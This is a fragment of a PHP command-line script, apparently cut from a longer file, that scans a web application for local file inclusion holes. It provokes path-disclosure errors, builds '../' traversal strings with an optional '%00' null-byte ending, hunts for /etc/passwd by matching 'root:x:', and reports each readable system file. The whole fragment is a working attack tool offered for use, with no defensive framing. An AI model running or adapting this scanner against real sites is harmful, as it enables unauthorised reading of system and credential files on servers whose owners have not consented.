\n"; print "[+] Example: $argv[0] http://site.com/file.php?path= 1 1\n"; exit; } if($argv[2] != '0' && $argv[2] != '1') { print "[+] Wrong type entered\n"; print "0 and 1 only\n"; exit; } if($argv[2] == '1') { $error = 1; } else { $error = 0; } if($argv[3] != '0' && $argv[3] != '1') { print "[+] Wrong end entered\n"; print "0 and 1 only\n"; exit; } if($argv[3] == '1') { $end = '%00'; } else { $end = ''; } if($error == '1') { print "Detecting Path...\n"; if(preg_match("/No such file or directory in (.*?)<\/b>/", open_site($argv[1]."'"), $path)) { print "[+] Found Path [ $path[1] ]\n"; } else { print "[+] Path not found...\n"; exit; } $p = explode("/", $path[1]); $cd = count($p)-2; for($i = 1; $i <= $cd; $i++) { $real .= "../"; } print "[+] LFI Path Count: $cd\n"; print "[+] LFI Directory : $real\n"; print "[+] Start LFI Scanning...\n"; foreach($file_scan as $path) { if(!preg_match("/Warning<\/b>:/", open_site($argv[1].$real.$path.$end))) { print "[+] Found LFI [ ".$argv[1].$real.$path.$end." ]\n"; } } } else { print "[+] Finding /etc/passwd path...\n"; foreach($passwd as $pass) { if(preg_match("/root:x:/", open_site($argv[1].$pass.$end))) { print "[+] /etc/passwd Found [ ".$argv[1].$pass." ]\n"; } } $p = explode("/", $pass); $cd = count($p)-2; for($i = 1; $i <= $cd; $i++) { $real .= "../"; } print "[+] LFI Path Count: $cd\n"; print "[+] LFI Directory : $real\n"; print "[+] Start LFI Scanning...\n"; foreach($file_scan as $file) { foreach($match as $list) { if(preg_match("/$list/", open_site($argv[1].$real.$file.$end))) { print "[+] LFI Found [ ".$argv[1].$real.$file.$end." ]\n"; } } } } function open_site($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $url); $result = curl_exec($ch); return $result; } ?>